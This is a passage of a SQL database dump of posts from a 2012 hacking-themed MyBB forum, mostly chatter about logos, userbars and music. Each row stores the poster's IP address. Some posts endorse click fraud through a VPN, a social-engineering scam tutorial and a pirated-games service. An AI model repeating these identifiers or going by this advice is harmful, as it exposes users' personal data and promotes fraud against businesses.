jok3r) just in case you like mine :)\r\n\r\n[img]http://i.imgur.com/qCK6A.png[/img]\r\n[/quote]\r\n\r\n\r\n\r\nRepped.\r\n\r\nYour GFX talent is amazing. I can\'t cook anything like that.\r\n\r\nI vote for Reloadzor\'s :p\r\n\r\nI\'m not sure if the 2nd image is broken or not.. I can\'t see it.\n[hr]\nEDIT: Nevermind. I see it. I like the first one.\n\nAlthough if Reloadzor\'s entry was in, I would choose Reloadzor\'s', '24.212.197.164', '416597412', '1', '0', '82', '1347913037', '1', '6403cc2a73c05dbc631d4f6ae683cf59', '0', '0'); INSERT INTO mybb_posts VALUES('2249', '431', '1957', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '112', '??????Z', '1347913608', 'Thats awesome, yeah please make the avatar. thanks', '92.23.230.99', '1545070179', '1', '0', '0', '0', '1', 'f8b2b6b3b75f19643b2ef052779697c9', '0', '0'); INSERT INTO mybb_posts VALUES('2250', '462', '2248', '35', 'RE: Vote for LHs new logo', '0', '62', 'R?????zo?', '1347914632', '[quote=\'iTzIpod\' pid=\'2248\' dateline=\'1347912948\']\r\n[quote=\'R?????zo?\' pid=\'2213\' dateline=\'1347875229\']\r\n[quote=\'iTzIpod\' pid=\'2198\' dateline=\'1347852424\']\r\n:/ I can\'t view the 2nd one since I\'m on Mobile. But for now, my vote goes to the 1st logo.\r\n\r\nI would like to see Reloadzor try out for this though! :D Good luck everyone.\r\n[/quote]\r\n\r\ni came up with this:\r\n\r\n[img]http://i.imgur.com/VMmLc.png[/img]\r\n[hr]\r\nheres the facebook avatar (for t3h jok3r) just in case you like mine :)\r\n\r\n[img]http://i.imgur.com/qCK6A.png[/img]\r\n[/quote]\r\n\r\n\r\n\r\nRepped.\r\n\r\nYour GFX talent is amazing. I can\'t cook anything like that.\r\n\r\nI vote for Reloadzor\'s :p\r\n\r\nI\'m not sure if the 2nd image is broken or not.. I can\'t see it.\r\n[hr]\r\nEDIT: Nevermind. I see it. I like the first one.\r\n\r\nAlthough if Reloadzor\'s entry was in, I would choose Reloadzor\'s\r\n[/quote]\r\n\r\nthanks alot.\r\nI try my best. And btw I will make you a better signature for you when I had the time, that one is way too simple I made it quickly :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '1bb8aa0a77b74ba779464345e722f74a', '0', '0'); INSERT INTO mybb_posts VALUES('2251', '462', '2250', '35', 'RE: Vote for LHs new logo', '0', '82', 'iTzIpod', '1347915590', '[quote=\'R?????zo?\' pid=\'2250\' dateline=\'1347914632\']\r\n[quote=\'iTzIpod\' pid=\'2248\' dateline=\'1347912948\']\r\n[quote=\'R?????zo?\' pid=\'2213\' dateline=\'1347875229\']\r\n[quote=\'iTzIpod\' pid=\'2198\' dateline=\'1347852424\']\r\n:/ I can\'t view the 2nd one since I\'m on Mobile. But for now, my vote goes to the 1st logo.\r\n\r\nI would like to see Reloadzor try out for this though! :D Good luck everyone.\r\n[/quote]\r\n\r\ni came up with this:\r\n\r\n[img]http://i.imgur.com/VMmLc.png[/img]\r\n[hr]\r\nheres the facebook avatar (for t3h jok3r) just in case you like mine :)\r\n\r\n[img]http://i.imgur.com/qCK6A.png[/img]\r\n[/quote]\r\n\r\n\r\n\r\nRepped.\r\n\r\nYour GFX talent is amazing. I can\'t cook anything like that.\r\n\r\nI vote for Reloadzor\'s :p\r\n\r\nI\'m not sure if the 2nd image is broken or not.. I can\'t see it.\r\n[hr]\r\nEDIT: Nevermind. I see it. I like the first one.\r\n\r\nAlthough if Reloadzor\'s entry was in, I would choose Reloadzor\'s\r\n[/quote]\r\n\r\nthanks alot.\r\nI try my best. And btw I will make you a better signature for you when I had the time, that one is way too simple I made it quickly :)\r\n[/quote]\r\n\r\nIt still looks nice.\r\nDon\'t worry you don\'t have too.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '22b637a8f048e6ea0c29ab27679d4059', '0', '0'); INSERT INTO mybb_posts VALUES('2252', '473', '0', '7', '1 Week within 1 Month', '0', '82', 'iTzIpod', '1347916175', 'Hey LH,\nStarting on the 20th, that will be my 1 month registered of iTzIpod.\n\nI made this L33t Hacking account back in 08-20-2012 (August 20, 2012)\nAnd in 3 more days, it will be 09-20-2012 (September 20, 2012)\nI\'m really excited :3\nI don\'t see why.. But I am :p\n\nAlso, I noticed that I have 1 Week Time Spent Online.\n\nI feel very proud.\n\nI get a cookie.\n\n(Just a Milestone Thread)\n\nLH has been a blast.\nI didn\'t regret registering on it.\n\n- iTzIpod', '24.212.197.164', '416597412', '1', '0', '82', '1347924070', '1', '542ecceefe3361e3a24a98fb00d6cad9', '0', '1347924070'); INSERT INTO mybb_posts VALUES('2253', '473', '2252', '7', 'RE: 1 Week within 1 Month', '0', '188', 'Lonnie', '1347923747', 'Congrats bro! What are you doing for your birthday?', '68.83.86.251', '1146312443', '0', '0', '0', '0', '1', '71ca2ef03418ba4b0a2b83f8e232d8ff', '0', '0'); INSERT INTO mybb_posts VALUES('2254', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '188', 'Lonnie', '1347924028', 'rock,techno,dubstep,pop,trance', '68.83.86.251', '1146312443', '0', '0', '0', '0', '1', '8b821659c20bf57ab4642f381c5abf53', '0', '0'); INSERT INTO mybb_posts VALUES('2255', '473', '2252', '7', 'RE: 1 Week within 1 Month', '0', '82', 'iTzIpod', '1347924039', 'LOL sorry. I guess I didn\'t explain it correctly..\n\nI meant it\'s like a birthday since I will almost be registered on this forum for 1 month now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3b475f91f62a355c13baebd79adc1584', '0', '0'); INSERT INTO mybb_posts VALUES('2256', '171', '2254', '8', 'RE: What Genre do you listen to?', '0', '82', 'iTzIpod', '1347924116', '[quote=\'Lonnie\' pid=\'2254\' dateline=\'1347924028\']\r\nrock,techno,dubstep,pop,trance\r\n[/quote]\r\n\r\nI seriously never heard of \"trance\"\r\nI\'m going to Google that right now :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e6c5ec3c92f0126379af3ac82e4cc88a', '0', '0'); INSERT INTO mybb_posts VALUES('2257', '439', '2197', '58', 'RE: Unique - Recruitment', '0', '82', 'iTzIpod', '1347924310', '[quote=\'swa4567\' pid=\'2197\' dateline=\'1347851990\']\r\nWhat are the requirements?\r\n[/quote]\r\n\r\nPlease wait until I am finished updating the thread :/\r\nI\'m really busy at the moment.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fa7cdeaec9c4df8b0da6f17017caef2f', '0', '0'); INSERT INTO mybb_posts VALUES('2258', '435', '1984', '4', 'RE: Newbie Here', '0', '20', 'JakeUS', '1347927900', 'Welcome to the site!\n\nEnjoy your stay.', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'f2e4fbe50b185ec7d758ba889772b8fa', '0', '0'); INSERT INTO mybb_posts VALUES('2259', '469', '2242', '3', 'RE: [Announcement]Going to clear up all the PMs on board', '0', '1', 't3h jok3r', '1347929148', '[quote=\'iTzIpod\' pid=\'2242\' dateline=\'1347910961\']\r\nWhen are you doing this? Like what time?\r\n[/quote]\r\n\r\nIn a couple of hours', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9fc14ea007eefcba2375ab854834d8b3', '0', '0'); INSERT INTO mybb_posts VALUES('2260', '469', '2259', '3', 'RE: [Announcement]Going to clear up all the PMs on board', '0', '82', 'iTzIpod', '1347929239', '[quote=\'t3h jok3r\' pid=\'2259\' dateline=\'1347929148\']\r\n[quote=\'iTzIpod\' pid=\'2242\' dateline=\'1347910961\']\r\nWhen are you doing this? Like what time?\r\n[/quote]\r\n\r\nIn a couple of hours\r\n[/quote]\r\n\r\nAlright done. I saved my important PMs.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ec84378d82926aab5973a6dd2af14249', '0', '0'); INSERT INTO mybb_posts VALUES('2261', '315', '1476', '61', 'RE: Welcome to Unique\'s HQ', '0', '82', 'iTzIpod', '1347934466', 'Stickied .', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3da5efc573910a540382e92522aa924e', '0', '0'); INSERT INTO mybb_posts VALUES('2262', '317', '1489', '61', 'RE: Unique\'s Purpose', '0', '82', 'iTzIpod', '1347934563', 'EDIT: Until I find a way to make NXK one of the leaders of Unique, only I will be able to moderate this section.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4e58254215a17951984fc141070302ca', '0', '0'); INSERT INTO mybb_posts VALUES('2263', '462', '2181', '35', 'RE: Vote for LHs new logo', '0', '1', 't3h jok3r', '1347934779', 'Mother fucker. Thanks a lot reloadzor, your logo made me say WOW. I was almost shocked (In a good way).\n\nI will be using reloadzors logo for the site and the second top in the ACP.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '88d492c8f71e3c987cb8a5716bd34462', '0', '0'); INSERT INTO mybb_posts VALUES('2264', '462', '2181', '35', 'RE: Vote for LHs new logo', '0', '82', 'iTzIpod', '1347934813', 'Oh dang. t3h jok3r just changed L33t Hacking\'s logo! :o Reloadzor he used your logo! Gratz! \nDamn.. That logo is sexy..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '641ef0f7a0efb64dd6a65bbcfe62371d', '0', '0'); INSERT INTO mybb_posts VALUES('2265', '470', '2247', '14', 'RE: [SHITLOAD][FRESH]Free proxy list', '0', '1', 't3h jok3r', '1347935070', '[quote=\'iTzIpod\' pid=\'2247\' dateline=\'1347912878\']\r\n@HoverCatz, I would put that in a spoiler/code, but I can\'t since I can\'t edit posts in this section. Sorry.\r\n\r\nOT: OP, you should just delete the ones that don\'t work. And post the ones that sirchamp posted. That way it doesn\'t take 10 seconds to scroll all the way down.\r\n\r\n(It doesn\'t take me 10 seconds just to scroll all the way down.. Just an expression)\r\n[/quote]\r\n\r\nI counted and it takes 36 seconds to scroll down including sirchamps post. I will wait few hours, if the OP doesn\'t update then I will.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c48f40bb6ca0a2f88cbee109bd2b6369', '0', '0'); INSERT INTO mybb_posts VALUES('2266', '431', '2214', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '1', 't3h jok3r', '1347935151', '[quote=\'R?????zo?\' pid=\'2214\' dateline=\'1347877024\']\r\n[quote=\'iTzIpod\' pid=\'2166\' dateline=\'1347825208\']\r\nLOL\r\nGotta love the first one.\r\nAsian guy <3\r\n\r\nOr he looks asian..\r\n[/quote]\r\n\r\nthought jok3r loved asians, am I wrong? ^^\r\n[/quote]\r\n\r\nI thought I was an American Muslim :?:', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6e05e38ef2d98c5537dbf8b4c07bdaff', '0', '0'); INSERT INTO mybb_posts VALUES('2267', '345', '2240', '63', 'RE: Need userbar! [Gamers]', '0', '61', 'NXK', '1347935261', '[quote=\'iTzIpod\' pid=\'2240\' dateline=\'1347910842\']\r\nWill try this out now.\r\n\r\nMight take a while since I have loads of homework to do.\r\n[hr]\r\nEDIT: Sorry, but these are very bad..\r\nI had to finish up my homework..\r\nTruly sorry.\r\nHere you go\r\nMade a few.\r\nNOTE: Some of them, I messed up on. So.. yeah..\r\n[img]http://i.imgur.com/6IrpX.png[/img]\r\n[img]http://i.imgur.com/TA6YN.png[/img]\r\n[IMG]http://i.imgur.com/X7sfo.png[/IMG]\r\n[IMG]http://i.imgur.com/6Qoo4.png[/IMG]\r\n[img]http://i.imgur.com/iLWJi.png[/img]\r\n[IMG]http://i.imgur.com/r6WJM.png[/IMG]\r\n[IMG]http://i.imgur.com/hvGIF.png[/IMG]\r\n[IMG]http://i.imgur.com/ordbC.png[/IMG]\r\n[IMG]http://i.imgur.com/sNucP.png[/IMG]\r\n[IMG]http://i.imgur.com/CWKlk.png[/IMG]\r\n[IMG]http://i.imgur.com/jXBZk.png[/IMG]\r\n[IMG]http://i.imgur.com/0pJoK.png[/IMG]\r\n@NXK, sorry :/\r\n[/quote]\r\n\r\nTHIS IS WHY I LOVE YOU\r\n\r\nEvery single one of those are amazing man. Deffinatly going to be picking one of these.', '99.253.94.204', '1677549260', '1', '0', '0', '0', '1', '880fb7d79a1ab5d1e50d8b5854195ed4', '0', '0'); INSERT INTO mybb_posts VALUES('2268', '443', '2217', '42', 'RE: Apple Announces the iPhone 5', '0', '1', 't3h jok3r', '1347935267', '[quote=\'??????Z\' pid=\'2217\' dateline=\'1347880872\']\r\ntry buying it in england, $700 starting price\r\n[/quote]\r\n\r\nWell then that\'s 350 pounds. Not exactly 700 bucks in England but 350 pounds is still a lot.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '070b6eaef57a3f9d6550aff48a9c92b5', '0', '0'); INSERT INTO mybb_posts VALUES('2269', '442', '2054', '42', 'RE: Giant Solar Flare set to hit Earth in 2013', '0', '1', 't3h jok3r', '1347935416', 'I don\'t want to die a virgin :\'(', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '13b829382d56baf2f44d43e28c2b6465', '0', '0'); INSERT INTO mybb_posts VALUES('2270', '470', '2265', '14', 'RE: [SHITLOAD][FRESH]Free proxy list', '0', '82', 'iTzIpod', '1347935438', '[quote=\'t3h jok3r\' pid=\'2265\' dateline=\'1347935070\']\r\n[quote=\'iTzIpod\' pid=\'2247\' dateline=\'1347912878\']\r\n@HoverCatz, I would put that in a spoiler/code, but I can\'t since I can\'t edit posts in this section. Sorry.\r\n\r\nOT: OP, you should just delete the ones that don\'t work. And post the ones that sirchamp posted. That way it doesn\'t take 10 seconds to scroll all the way down.\r\n\r\n(It doesn\'t take me 10 seconds just to scroll all the way down.. Just an expression)\r\n[/quote]\r\n\r\n[b]I counted and it takes 36 seconds to scroll down including sirchamps post.[/b] I will wait few hours, if the OP doesn\'t update then I will.\r\n[/quote]\r\n\r\n\r\nSigh t3h jok3r...\r\n\r\nAre you serious? \r\nLol\r\nAlright. I will be releasing my Proxy List soon. Don\'t worry it\'ll be in a .txt file (Notepad)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b6adc24bad3e3dc2096fe6422b914bc5', '0', '0'); INSERT INTO mybb_posts VALUES('2271', '238', '1021', '56', 'RE: Ban the user above you', '0', '1', 't3h jok3r', '1347935452', 'Banned for having more posts than me.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3603b2bea3cbfc5061ba1b3ddc01609d', '0', '0'); INSERT INTO mybb_posts VALUES('2272', '197', '696', '56', 'RE: /me Thread', '0', '1', 't3h jok3r', '1347935470', '/me says STFU to iTzIpod', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'aad31c2df0ae7ec575020b60c903ddbb', '0', '0'); INSERT INTO mybb_posts VALUES('2273', '345', '2267', '63', 'RE: Need userbar! [Gamers]', '0', '82', 'iTzIpod', '1347935566', '[quote=\'NXK\' pid=\'2267\' dateline=\'1347935261\']\r\n[quote=\'iTzIpod\' pid=\'2240\' dateline=\'1347910842\']\r\nWill try this out now.\r\n\r\nMight take a while since I have loads of homework to do.\r\n[hr]\r\nEDIT: Sorry, but these are very bad..\r\nI had to finish up my homework..\r\nTruly sorry.\r\nHere you go\r\nMade a few.\r\nNOTE: Some of them, I messed up on. So.. yeah..\r\n[img]http://i.imgur.com/6IrpX.png[/img]\r\n[img]http://i.imgur.com/TA6YN.png[/img]\r\n[IMG]http://i.imgur.com/X7sfo.png[/IMG]\r\n[IMG]http://i.imgur.com/6Qoo4.png[/IMG]\r\n[img]http://i.imgur.com/iLWJi.png[/img]\r\n[IMG]http://i.imgur.com/r6WJM.png[/IMG]\r\n[IMG]http://i.imgur.com/hvGIF.png[/IMG]\r\n[IMG]http://i.imgur.com/ordbC.png[/IMG]\r\n[IMG]http://i.imgur.com/sNucP.png[/IMG]\r\n[IMG]http://i.imgur.com/CWKlk.png[/IMG]\r\n[IMG]http://i.imgur.com/jXBZk.png[/IMG]\r\n[IMG]http://i.imgur.com/0pJoK.png[/IMG]\r\n@NXK, sorry :/\r\n[/quote]\r\n\r\nTHIS IS WHY I LOVE YOU\r\n\r\nEvery single one of those are amazing man. Deffinatly going to be picking one of these.\r\n[/quote]\r\n\r\nYou\'re kidding.\r\nReloadzor has better GFX Talent then me. You gotta admit. Animated GFX Userbars are sexy. I would make one, but I don\'t know how. Plus, I rushed these.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '25dcc61f608490789789f3c717004ccc', '0', '0'); INSERT INTO mybb_posts VALUES('2274', '437', '2233', '3', 'RE: Help keep LH up', '0', '1', 't3h jok3r', '1347935598', '[quote=\'iTzIpod\' pid=\'2233\' dateline=\'1347910102\']\r\nWait. Is it possible to get a click +1 from the same IP? Like I already clicked them before.\r\nBut if I click them again, will your clicks go up?\r\n[/quote]\r\n\r\nThey would only accept 4 clicks per link. Other clicks won\'t be counted, I would recommend using hotspotshield.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6933a531e7e61b8279ace875f033d5d9', '0', '0'); INSERT INTO mybb_posts VALUES('2275', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1347935691', '/me says STFU to t3h jok3r for saying STFU to iTzIpod.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2d9affdd885108235ddc5ee380f9ffe1', '0', '0'); INSERT INTO mybb_posts VALUES('2276', '442', '2054', '42', 'RE: Giant Solar Flare set to hit Earth in 2013', '0', '82', 'iTzIpod', '1347935768', 'Don\'t die a virgin then.\nO_o \n\nxD\n\nIf this does happen, just remember t3h jok3r, I love you.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cee1b74a33c755b75cb0a07b9c0fde04', '0', '0'); INSERT INTO mybb_posts VALUES('2277', '468', '2237', '16', 'RE: [TUT] Free Dre Beats [Unconfirmed]', '0', '5', 'Timmy', '1347935799', '[quote=\'iTzIpod\' pid=\'2237\' dateline=\'1347910606\']\r\nI\'ve seen this method a couple times. It didn\'t work for some members on a different forum.\r\n[/quote]\r\n\r\nI\'m sure it\'s because they are doing it wrong. If someone is a good social engineer then they should be able to work their way out.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '824ae08f0cffadc05fcd2fa593e31d26', '0', '0'); INSERT INTO mybb_posts VALUES('2278', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1347935802', 'Banned for having less posts than me', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '84e0ab259f0616bdbb22da87e59a4d36', '0', '0'); INSERT INTO mybb_posts VALUES('2279', '442', '2054', '42', 'RE: Giant Solar Flare set to hit Earth in 2013', '0', '5', 'Timmy', '1347935982', 'If the internet is gone then the Earth would be 90% dead.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '83f5fcfc5011e99ed4542262507c68a1', '0', '0'); INSERT INTO mybb_posts VALUES('2280', '462', '2264', '35', 'RE: Vote for LHs new logo', '0', '5', 'Timmy', '1347936076', '[quote=\'iTzIpod\' pid=\'2264\' dateline=\'1347934813\']\r\nOh dang. t3h jok3r just changed L33t Hacking\'s logo! :o Reloadzor he used your logo! Gratz! \r\nDamn.. That logo is sexy..\r\n[/quote]\r\nIs it just me or I don\'t see it anymore?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b2665dddcba838dea134f68c120f0721', '0', '0'); INSERT INTO mybb_posts VALUES('2281', '436', '1988', '7', 'RE: Motivation', '0', '5', 'Timmy', '1347936130', 'Yeah School is messing up a lot of peoples schedules/plans. Schools especially work are keeping people busy.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '2a141161624f4ce3d9008ffe2703ce2c', '0', '0'); INSERT INTO mybb_posts VALUES('2282', '446', '2199', '28', 'RE: This forum is dead..', '0', '5', 'Timmy', '1347936192', '[quote=\'iTzIpod\' pid=\'2199\' dateline=\'1347852654\']\r\n[quote=\'t3h jok3r\' pid=\'2182\' dateline=\'1347848401\']\r\n[quote=\'Apathy\' pid=\'2133\' dateline=\'1347807770\']\r\nI agree. And technically weren\'t you the first active member joker and me second?\r\n[/quote]\r\n\r\nUhh **Got caught** No, because we are humans not robots so we can\'t be \"technically\" :cool:\r\n[/quote]\r\n\r\nLol\r\n\r\n\r\n\r\nBasically?\r\n[/quote]\r\n\r\nPlease be HQ, do not try to bypass the 25 character limit. Post Reported!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8a71a7ac9e0c158215cd51c836c2d394', '0', '0'); INSERT INTO mybb_posts VALUES('2283', '469', '2210', '3', 'RE: [Announcement]Going to clear up all the PMs on board', '0', '5', 'Timmy', '1347936267', 'Not a bad idea, maybe then LH members could keep more avatars, attachments etc.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '6ee2aa9231fe8c09211551f4fab00038', '0', '0'); INSERT INTO mybb_posts VALUES('2287', '474', '0', '25', 'What antivirus you have?', '0', '7', 'Romdu62', '1347936563', 'what antivirus do you have right now?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '99d8f8458de567b0ca86aee95c8a58df', '0', '0'); INSERT INTO mybb_posts VALUES('2288', '442', '2054', '42', 'RE: Giant Solar Flare set to hit Earth in 2013', '0', '82', 'iTzIpod', '1347936753', 'Lol Timmy. If that happened, I wouldn\'t wanna live on Earth anymore..\n\nAlso, nice signature picture. But I suggest you change it to LH\'s current logo.\nJust a suggestion.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'fded71a8f7422b10badd217ad0d8eaa7', '0', '0'); INSERT INTO mybb_posts VALUES('2289', '462', '2280', '35', 'RE: Vote for LHs new logo', '0', '82', 'iTzIpod', '1347936838', '[quote=\'Timmy\' pid=\'2280\' dateline=\'1347936076\']\r\n[quote=\'iTzIpod\' pid=\'2264\' dateline=\'1347934813\']\r\nOh dang. t3h jok3r just changed L33t Hacking\'s logo! :o Reloadzor he used your logo! Gratz! \r\nDamn.. That logo is sexy..\r\n[/quote]\r\nIs it just me or I don\'t see it anymore?\r\n[/quote]\r\n\r\nWow..\r\nI just noticed that :(\r\nYeah. t3h jok3r probably changed it back', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd47689831245175d8358495b7538cbf3', '0', '0'); INSERT INTO mybb_posts VALUES('2290', '474', '2287', '25', 'RE: What antivirus you have?', '0', '82', 'iTzIpod', '1347937021', 'I have Norton 360 and MalwareBytes.\nNot the best or whatever, but it still does something. So oh well.\n\n:whistle:', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0975da38ec61001c735c933f60567c4f', '0', '0'); INSERT INTO mybb_posts VALUES('2291', '442', '2276', '42', 'RE: Giant Solar Flare set to hit Earth in 2013', '0', '1', 't3h jok3r', '1347937476', '[quote=\'iTzIpod\' pid=\'2276\' dateline=\'1347935768\']\r\nDon\'t die a virgin then.\r\nO_o \r\n\r\nxD\r\n\r\nIf this does happen, just remember t3h jok3r, I love you.\r\n[/quote]\r\n\r\nNah I\'m good. I can afford a full night whore.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '3d680c287842eb9a0d2c5ec1c2cbe39f', '0', '0'); INSERT INTO mybb_posts VALUES('2292', '474', '2287', '25', 'RE: What antivirus you have?', '0', '1', 't3h jok3r', '1347937565', 'I use a special program called Nothing because my PC is old so it can\'t keep heavy programs however I don\'t download any .exe files neither I download from unknown sites anymore and I use sandbox so pretty safe enough.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b3c623ef50e76b881870e7717624b5f9', '0', '0'); INSERT INTO mybb_posts VALUES('2293', '462', '2181', '35', 'RE: Vote for LHs new logo', '0', '2', 'Apathy', '1347938338', 'I can make better ones I may make one when I have some free time. For now I voted 1.', '173.206.178.83', '-1378962861', '0', '0', '0', '0', '1', '8246e6597fe5a0567ebd697183df9fc6', '0', '0'); INSERT INTO mybb_posts VALUES('2294', '469', '2210', '3', 'RE: [Announcement]Going to clear up all the PMs on board', '0', '1', 't3h jok3r', '1347938745', 'Completed. Thread closed!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'dadb31389deee596b73ef8b71af6ddc1', '0', '0'); INSERT INTO mybb_posts VALUES('2295', '441', '2115', '61', 'RE: Adf.ly Bot + Adfoc.us Bot', '0', '1', 't3h jok3r', '1347938985', '[quote=\'iTzIpod\' pid=\'2115\' dateline=\'1347765139\']\r\n[quote=\'t3h jok3r\' pid=\'2112\' dateline=\'1347756651\']\r\nTrojan? Can you explain why the virus results detected a Trojan?\r\n[/quote]\r\n\r\nIt\'s a fake\r\n[/quote]\r\n\r\nIt\'s a fake what?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'd93d95a5d00191672cdcc2097de51ae6', '0', '0'); INSERT INTO mybb_posts VALUES('2297', '96', '229', '30', 'RE: FBI Tools [11 in 1]', '0', '1', 't3h jok3r', '1347940681', 'How did everyone forget about this thread?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0255b5b5caeb005d72b49b886e5d23bc', '0', '0'); INSERT INTO mybb_posts VALUES('2300', '462', '2181', '35', 'RE: Vote for LHs new logo', '0', '62', 'R?????zo?', '1347954201', 'glad you liked my logo :)', '92.250.107.177', '1559915441', '1', '0', '0', '0', '1', '7e2cffca2e0d146de7bc0008c71ba915', '0', '0'); INSERT INTO mybb_posts VALUES('2301', '431', '2266', '61', 'RE: R?????zo?\'s GFX Service [FREE]', '0', '62', 'R?????zo?', '1347954383', '[quote=\'t3h jok3r\' pid=\'2266\' dateline=\'1347935151\']\n[quote=\'R?????zo?\' pid=\'2214\' dateline=\'1347877024\']\n[quote=\'iTzIpod\' pid=\'2166\' dateline=\'1347825208\']\nLOL\nGotta love the first one.\nAsian guy <3\n\nOr he looks asian..\n[/quote]\n\nthought jok3r loved asians, am I wrong? ^^\n[/quote]\n\nI thought I was an American Muslim :?:\n[/quote]\n\ndid you liked any of my user bars though?\n[hr]\n[quote=\'??????Z\' pid=\'2249\' dateline=\'1347913608\']\nThats awesome, yeah please make the avatar. thanks\n[/quote]\n\nhere it is:\n\n[img]http://i.imgur.com/yccvM.png[/img]\n\n(had no idea what to make it, so I made your initial hope thats cool :) )', '92.250.107.177', '1559915441', '1', '0', '62', '1347955174', '1', '1686ddd59fe277d4003c299b3bc372a1', '0', '1347955174'); INSERT INTO mybb_posts VALUES('2302', '428', '2175', '74', 'RE: Dark Steam | Free Steam Games', '0', '62', 'R?????zo?', '1347954588', '[quote=\'??????Z\' pid=\'2175\' dateline=\'1347840936\']\r\nbeen a premium member with them about a year. \r\n\r\n1: no you cannot play on normal servers or online, you must play on cracked servers for any online games. \r\n2: if you like darksteam then it is really worth paying for a premium account because normal accounts have little amount of games you can dl.\r\n\r\ni only use it for single player games or games that i want to play just the missions of. i only ever pay for games if i want to play the multiplayer part of the game.\r\n\r\ngot any questions about it then you can pm me here or fine me on the darksteam website with the same username as here.\r\n[/quote]\r\n\r\nThanks, I got all my answers. I will probably use this for single player games then :)', '92.250.107.177', '1559915441', '1', '0', '0', '0', '1', 'df24bd196182bd81af6dae47f99a8634', '0', '0'); INSERT INTO mybb_posts VALUES('2303', '171', '528', '8', 'RE: What Genre do you listen to?', '0', '62', 'R?????zo?', '1347957841', 'rock, pop,dubstep, house, some trance and techno\nI used to listen rap before though.', '46.50.28.204', '775036108', '1', '0', '0', '0', '1', '9199326384486f1155e0f8fd82983118', '0', '0'); INSERT INTO mybb_posts VALUES('2304', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '112', '??????Z', '1347964400', 'thanks pal, looks nice :)', '92.23.230.99', '1545070179', '1', '0', '0', '0', '1', '4ea826de921a9d5b9d9fddefbf49f7f6', '0', '0'); INSERT INTO mybb_posts VALUES('2305', '441', '2053', '61', 'RE: Adf.ly Bot + Adfoc.us Bot', '0', '82', 'iTzIpod', '1347968599', 'Why in the world did you do that??? :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'f84f4c38a3351146fc83666a6f29c247', '0', '0'); INSERT INTO mybb_posts VALUES('2306', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1347972139', 'your welcome, I\'m still doing this offer for free.\nC\'mon guys post your request :)', '92.250.118.41', '1559918121', '1', '0', '0', '0', '1', '9b45a543b5d582a7b989f73f1efa433b', '0', '0'); INSERT INTO mybb_posts VALUES('2307', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '112', '??????Z', '1347976009', '$700 is £431 pounds i was actually wrong it will cost more like $850 which is about £523 pounds.', '92.23.230.99', '1545070179', '1', '0', '0', '0', '1', '0a98cef0bf780e13db300c33a914bd52', '0', '0'); INSERT INTO mybb_posts VALUES('2308', '443', '2055', '42', 'RE: Apple Announces the iPhone 5', '0', '62', 'R?????zo?', '1347977455', 'its gonna be like 500€ where I live which is about $652\nthats expensive :)', '92.250.118.41', '1559918121', '1', '0', '0', '0', '1', '6a0e47ef2c45b10f7171f71ae76b2e4c', '0', '0'); INSERT INTO mybb_posts VALUES('2309', '96', '229', '30', 'RE: FBI Tools [11 in 1]', '0', '53', 'sirchamp', '1347981764', 'How didnt I see this thread before :O Thanks for share', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'c48bb4970fc2e27f43bebedb50d88529', '0', '0'); INSERT INTO mybb_posts VALUES('2310', '462', '2300', '35', 'RE: Vote for LHs new logo', '0', '1', 't3h jok3r', '1347984493', '[quote=\'R?????zo?\' pid=\'2300\' dateline=\'1347954201\']\nglad you liked my logo :)\n[/quote]\n\nThanks for making LH a new logo.\n\n[quote]\nI can make better ones I may make one when I have some free time. For now I voted 1.\n[/quote]\n\nAre you sure? ;)', '72.231.24.165', '1223104677', '1', '0', '1', '1347984554', '1', '4c11ee1f68205d2d2bc025ee9e6fe270', '0', '1347984554'); INSERT INTO mybb_posts VALUES('2311', '409', '1889', '30', 'RE: [Full] Forum Poster 3.30', '0', '1', 't3h jok3r', '1347984756', 'This bot supports the outdated versions of 